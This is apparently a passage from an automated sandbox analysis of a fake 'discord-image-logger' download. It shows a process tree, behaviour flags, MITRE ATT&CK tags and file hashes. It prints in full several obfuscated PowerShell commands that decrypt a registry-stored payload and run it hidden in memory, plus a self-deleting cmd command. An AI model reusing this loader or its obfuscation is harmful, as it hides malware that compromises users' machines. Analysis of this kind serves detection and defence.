'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Windows directory
PID:4708 -
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function PprBf($RmAux){ $VbRCn=[System.Security.Cryptography.Aes]::Create(); $VbRCn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $VbRCn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $VbRCn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU='); $VbRCn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ=='); $nMOmr=$VbRCn.('rotpyrceDetaerC'[-1..-15] -join '')(); $WZWky=$nMOmr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmAux, 0, $RmAux.Length); $nMOmr.Dispose(); $VbRCn.Dispose(); $WZWky;}function SPSlI($RmAux){ $qrnaZ=New-Object System.IO.MemoryStream(,$RmAux); $RJeXu=New-Object System.IO.MemoryStream; $eBeQA=New-Object System.IO.Compression.GZipStream($qrnaZ, [IO.Compression.CompressionMode]::Decompress); $eBeQA.CopyTo($RJeXu); $eBeQA.Dispose(); $qrnaZ.Dispose(); $RJeXu.Dispose(); $RJeXu.ToArray();}function aBEzg($RmAux,$ZKJrf){ $oxAUi=[System.Reflection.Assembly]::Load([byte[]]$RmAux); $qVnjt=$oxAUi.EntryPoint; $qVnjt.Invoke($null, $ZKJrf);}$VbRCn1 = New-Object System.Security.Cryptography.AesManaged;$VbRCn1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VbRCn1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VbRCn1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU=');$VbRCn1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ==');$MSWRP = $VbRCn1.('rotpyrceDetaerC'[-1..-15] -join '')();$NUNZn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iZ8jPKmNkFdL1A6USwSGLA==');$NUNZn = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn, 0, $NUNZn.Length);$NUNZn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn);$cBXxm = 
[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('302eS2iAhetJuvIY9pVgKOFxBony5LGiLQi+lPOo9Ig=');$cBXxm = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cBXxm, 0, $cBXxm.Length);$cBXxm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cBXxm);$GlTUf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2/VItTApDmqYld7UNbITmw==');$GlTUf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GlTUf, 0, $GlTUf.Length);$GlTUf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GlTUf);$YQTnf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y7u8mHn+uE8DouxrXvlfhI8HvaFVabiSu9wW1NQnVBW3d+pbXbyeWiMzHsShgQVzWTccLy3R/sL1Fgo2ngbj1Xyhdd8QHKlT7xJYowF1jSmMT/YNyn61oZ4EBOdIILtHY76iwoY89T/0NXOlbVQSqG6f76Tvu+/ljtRIjK68ygJujUjyjF9W1UFNXnjlbvKaQ0BTSj7AUpwYBspcSQUSWqlV4JZYmfkLzrzzafMFwHzW6zgfk8rU5wxN2vDnC7yji58n7rylZaggz4+okuyhoMrfM4k/T/mqHJ8VdUFO8xpIeX3hePuaZ5Z58y1CyCEoFhGVyjfm3AnZl3fgFnvsWSS15RXMq5KXGV3I38NkazdqvV05jjZTTECaOwsRwu2zLdJ29XVcSC4yPm3wAT5LZe+YH34hMw11+Tv5n+xxqwY=');$YQTnf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YQTnf, 0, $YQTnf.Length);$YQTnf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YQTnf);$CPWdf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vGf9ES1PdsfKW8Swn9bI3w==');$CPWdf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CPWdf, 0, $CPWdf.Length);$CPWdf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CPWdf);$igAgV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3UiHcuo7jcw/WkburfrLBQ==');$igAgV = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igAgV, 0, $igAgV.Length);$igAgV = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igAgV);$ZYOXs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hDpsuPmELCzhYTCugvhrpA==');$ZYOXs = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZYOXs, 0, $ZYOXs.Length);$ZYOXs = 
[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZYOXs);$cmXWw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Duasd/EcBtQj2cZsgiwg+Q==');$cmXWw = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cmXWw, 0, $cmXWw.Length);$cmXWw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cmXWw);$qpchR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KDa4G8PrmTjfH/8cqC5WDg==');$qpchR = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qpchR, 0, $qpchR.Length);$qpchR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qpchR);$NUNZn0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkNHx2c/PIn2isifrSOkpw==');$NUNZn0 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn0, 0, $NUNZn0.Length);$NUNZn0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn0);$NUNZn1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QCQIFS3Mnpd27lKyoiLRsA==');$NUNZn1 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn1, 0, $NUNZn1.Length);$NUNZn1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn1);$NUNZn2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('McBhlHe8GfiHzcJuHtKawA==');$NUNZn2 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn2, 0, $NUNZn2.Length);$NUNZn2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn2);$NUNZn3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iUE4hGy8AZeVxL9AvErB6A==');$NUNZn3 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn3, 0, $NUNZn3.Length);$NUNZn3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn3);$MSWRP.Dispose();$VbRCn1.Dispose();if (@(get-process -ea silentlycontinue $NUNZn3).count -gt 1) {exit};$Stjgn = 
[Microsoft.Win32.Registry]::$cmXWw.$ZYOXs($NUNZn).$igAgV($cBXxm);$hQsbc=[string[]]$Stjgn.Split('\');$YNdMX=SPSlI(PprBf([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($hQsbc[1])));aBEzg $YNdMX (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$NbCPC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($hQsbc[0]);$VbRCn = New-Object System.Security.Cryptography.AesManaged;$VbRCn.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VbRCn.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VbRCn.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU=');$VbRCn.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ==');$nMOmr = $VbRCn.('rotpyrceDetaerC'[-1..-15] -join '')();$NbCPC = $nMOmr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NbCPC, 0, $NbCPC.Length);$nMOmr.Dispose();$VbRCn.Dispose();$qrnaZ = New-Object System.IO.MemoryStream(, $NbCPC);$RJeXu = New-Object System.IO.MemoryStream;$eBeQA = New-Object System.IO.Compression.GZipStream($qrnaZ, [IO.Compression.CompressionMode]::$NUNZn1);$eBeQA.$qpchR($RJeXu);$eBeQA.Dispose();$qrnaZ.Dispose();$RJeXu.Dispose();$NbCPC = $RJeXu.ToArray();$dlxUL = $YQTnf | IEX;$oxAUi = $dlxUL::$NUNZn2($NbCPC);$qVnjt = $oxAUi.EntryPoint;$qVnjt.$NUNZn0($null, (, [string[]] ($GlTUf)))4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:6052 -
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6052).WaitForExit();[System.Threading.Thread]::Sleep(5000); function PprBf($RmAux){ $VbRCn=[System.Security.Cryptography.Aes]::Create(); $VbRCn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $VbRCn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $VbRCn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU='); $VbRCn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ=='); $nMOmr=$VbRCn.('rotpyrceDetaerC'[-1..-15] -join '')(); $WZWky=$nMOmr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmAux, 0, $RmAux.Length); $nMOmr.Dispose(); $VbRCn.Dispose(); $WZWky;}function SPSlI($RmAux){ $qrnaZ=New-Object System.IO.MemoryStream(,$RmAux); $RJeXu=New-Object System.IO.MemoryStream; $eBeQA=New-Object System.IO.Compression.GZipStream($qrnaZ, [IO.Compression.CompressionMode]::Decompress); $eBeQA.CopyTo($RJeXu); $eBeQA.Dispose(); $qrnaZ.Dispose(); $RJeXu.Dispose(); $RJeXu.ToArray();}function aBEzg($RmAux,$ZKJrf){ $oxAUi=[System.Reflection.Assembly]::Load([byte[]]$RmAux); $qVnjt=$oxAUi.EntryPoint; $qVnjt.Invoke($null, $ZKJrf);}$VbRCn1 = New-Object System.Security.Cryptography.AesManaged;$VbRCn1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VbRCn1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VbRCn1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU=');$VbRCn1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ==');$MSWRP = $VbRCn1.('rotpyrceDetaerC'[-1..-15] -join '')();$NUNZn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iZ8jPKmNkFdL1A6USwSGLA==');$NUNZn = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn, 0, $NUNZn.Length);$NUNZn = 
[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn);$cBXxm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('302eS2iAhetJuvIY9pVgKOFxBony5LGiLQi+lPOo9Ig=');$cBXxm = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cBXxm, 0, $cBXxm.Length);$cBXxm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cBXxm);$GlTUf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2/VItTApDmqYld7UNbITmw==');$GlTUf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GlTUf, 0, $GlTUf.Length);$GlTUf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GlTUf);$YQTnf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y7u8mHn+uE8DouxrXvlfhI8HvaFVabiSu9wW1NQnVBW3d+pbXbyeWiMzHsShgQVzWTccLy3R/sL1Fgo2ngbj1Xyhdd8QHKlT7xJYowF1jSmMT/YNyn61oZ4EBOdIILtHY76iwoY89T/0NXOlbVQSqG6f76Tvu+/ljtRIjK68ygJujUjyjF9W1UFNXnjlbvKaQ0BTSj7AUpwYBspcSQUSWqlV4JZYmfkLzrzzafMFwHzW6zgfk8rU5wxN2vDnC7yji58n7rylZaggz4+okuyhoMrfM4k/T/mqHJ8VdUFO8xpIeX3hePuaZ5Z58y1CyCEoFhGVyjfm3AnZl3fgFnvsWSS15RXMq5KXGV3I38NkazdqvV05jjZTTECaOwsRwu2zLdJ29XVcSC4yPm3wAT5LZe+YH34hMw11+Tv5n+xxqwY=');$YQTnf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YQTnf, 0, $YQTnf.Length);$YQTnf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YQTnf);$CPWdf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vGf9ES1PdsfKW8Swn9bI3w==');$CPWdf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CPWdf, 0, $CPWdf.Length);$CPWdf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CPWdf);$igAgV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3UiHcuo7jcw/WkburfrLBQ==');$igAgV = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igAgV, 0, $igAgV.Length);$igAgV = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igAgV);$ZYOXs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hDpsuPmELCzhYTCugvhrpA==');$ZYOXs = 
$MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZYOXs, 0, $ZYOXs.Length);$ZYOXs = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZYOXs);$cmXWw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Duasd/EcBtQj2cZsgiwg+Q==');$cmXWw = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cmXWw, 0, $cmXWw.Length);$cmXWw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cmXWw);$qpchR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KDa4G8PrmTjfH/8cqC5WDg==');$qpchR = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qpchR, 0, $qpchR.Length);$qpchR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qpchR);$NUNZn0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkNHx2c/PIn2isifrSOkpw==');$NUNZn0 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn0, 0, $NUNZn0.Length);$NUNZn0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn0);$NUNZn1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QCQIFS3Mnpd27lKyoiLRsA==');$NUNZn1 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn1, 0, $NUNZn1.Length);$NUNZn1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn1);$NUNZn2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('McBhlHe8GfiHzcJuHtKawA==');$NUNZn2 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn2, 0, $NUNZn2.Length);$NUNZn2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn2);$NUNZn3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iUE4hGy8AZeVxL9AvErB6A==');$NUNZn3 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn3, 0, $NUNZn3.Length);$NUNZn3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn3);$MSWRP.Dispose();$VbRCn1.Dispose();if (@(get-process -ea silentlycontinue $NUNZn3).count -gt 1) {exit};$Stjgn = 
[Microsoft.Win32.Registry]::$cmXWw.$ZYOXs($NUNZn).$igAgV($cBXxm);$hQsbc=[string[]]$Stjgn.Split('\');$YNdMX=SPSlI(PprBf([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($hQsbc[1])));aBEzg $YNdMX (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$NbCPC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($hQsbc[0]);$VbRCn = New-Object System.Security.Cryptography.AesManaged;$VbRCn.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VbRCn.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VbRCn.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU=');$VbRCn.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ==');$nMOmr = $VbRCn.('rotpyrceDetaerC'[-1..-15] -join '')();$NbCPC = $nMOmr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NbCPC, 0, $NbCPC.Length);$nMOmr.Dispose();$VbRCn.Dispose();$qrnaZ = New-Object System.IO.MemoryStream(, $NbCPC);$RJeXu = New-Object System.IO.MemoryStream;$eBeQA = New-Object System.IO.Compression.GZipStream($qrnaZ, [IO.Compression.CompressionMode]::$NUNZn1);$eBeQA.$qpchR($RJeXu);$eBeQA.Dispose();$qrnaZ.Dispose();$RJeXu.Dispose();$NbCPC = $RJeXu.ToArray();$dlxUL = $YQTnf | IEX;$oxAUi = $dlxUL::$NUNZn2($NbCPC);$qVnjt = $oxAUi.EntryPoint;$qVnjt.$NUNZn0($null, (, [string[]] ($GlTUf)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
PID:1596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\Downloads\discord-image-logger-release\discord-image-logger-release\build.bat.exe" & ATTRIB -h -s "C:\Users\Admin\Downloads\discord-image-logger-release\discord-image-logger-release\build.bat.exe" & del /f "C:\Users\Admin\Downloads\discord-image-logger-release\discord-image-logger-release\build.bat.exe"4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6424 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:6440
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6424 -s 2965⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6636
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\discord-image-logger-release\discord-image-logger-release\build.bat" "2⤵
- Drops file in Windows directory
PID:2752 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4420
-
-
C:\Windows\system32\net.exenet session3⤵PID:1636
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵PID:4944
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3644
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3820
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3976
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4144
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4936
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:3744
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:2236
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1852
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4440
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3280
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
- Drops file in System32 directory
PID:4804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:3264
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:4772
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:940
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3340
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4108
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:4816
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵PID:1640
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
PID:1308
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:2080
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:4100
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:2280
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:3656
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:3444
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:5320
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:2844
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:2848
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:4848
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{76BE8257-C4C0-4D37-90C0-A23372254D27}1⤵PID:1272
-
C:\Windows\system32\SearchIndexer.exeC:\Windows\system32\SearchIndexer.exe /Embedding1⤵
- Modifies data under HKEY_USERS
PID:4100 -
C:\Windows\system32\SearchProtocolHost.exe"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"2⤵
- Modifies data under HKEY_USERS
PID:3960
-
-
C:\Windows\system32\SearchFilterHost.exe"C:\Windows\system32\SearchFilterHost.exe" 0 804 808 816 8192 812 7882⤵
- Modifies data under HKEY_USERS
PID:5240
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:2092
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:6516 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 444 -p 6424 -ip 64242⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6560
-
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:1820
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Hide Artifacts 2
Hidden Files and Directories 1
Hidden Window 1
Modify Registry 1
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
Filesize10KB
MD5ba7d1fd56bbac2611ae3b4018e9909cd
SHA1ed9806d32296111258735d8fb3434826d2009b77
SHA2565cff6e26794b16341325bcae8b159c3ae937d34ff69460aedd513ef45e97b6d9
SHA51238ff4472ae88572934016d463507710694d93f38c9aeae54ab708e40ff2b7c0cf08d0977c727631008513e55405d70e82b3dbe006bec2977db46188504cf6878
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize10KB
MD57914b6f8a0fae1ecc3e233bebc3ff315
SHA13ea30e645edf986834b07ecbb384fc6ef69ee521
SHA2565d5cf7b21178c3ef0c5b159c5defb58f27dee68a5bfa3ab8f9739e68c3cc5d7f
SHA51286c1069c8f0ffce09600f51cf479d114d05c4a1c7df6a05d1b191a3c9aa99cb576d78262ae5bd718cae483b83b86314756854f124ebbc0366d33238be172cba2
-
Filesize
8.8MB
MD5dd33133b656c61a2c1d79dfa92d7f57c
SHA1396e7c7a2b2f7fbaba95d768c2e0e48fa928c8c1
SHA256498e1a7d867df07ffa85a9f56e34faf43988b54cc84107e4696a9039fdb8c059
SHA512c0b1c2dfe358e31529403542abd2e3d98287488bcbb07eb1191bc1b2ada94406d3b6fca0d8de0f9824cea861ebfdf9d591e5606e80f7d3bade4e3262c0ca1b5f
-
C:\Users\Admin\Downloads\discord-image-logger-release\discord-image-logger-release\.vscode\settings.json
Filesize53B
MD576a322b0ed73c31e6c0aa1babb1af1c5
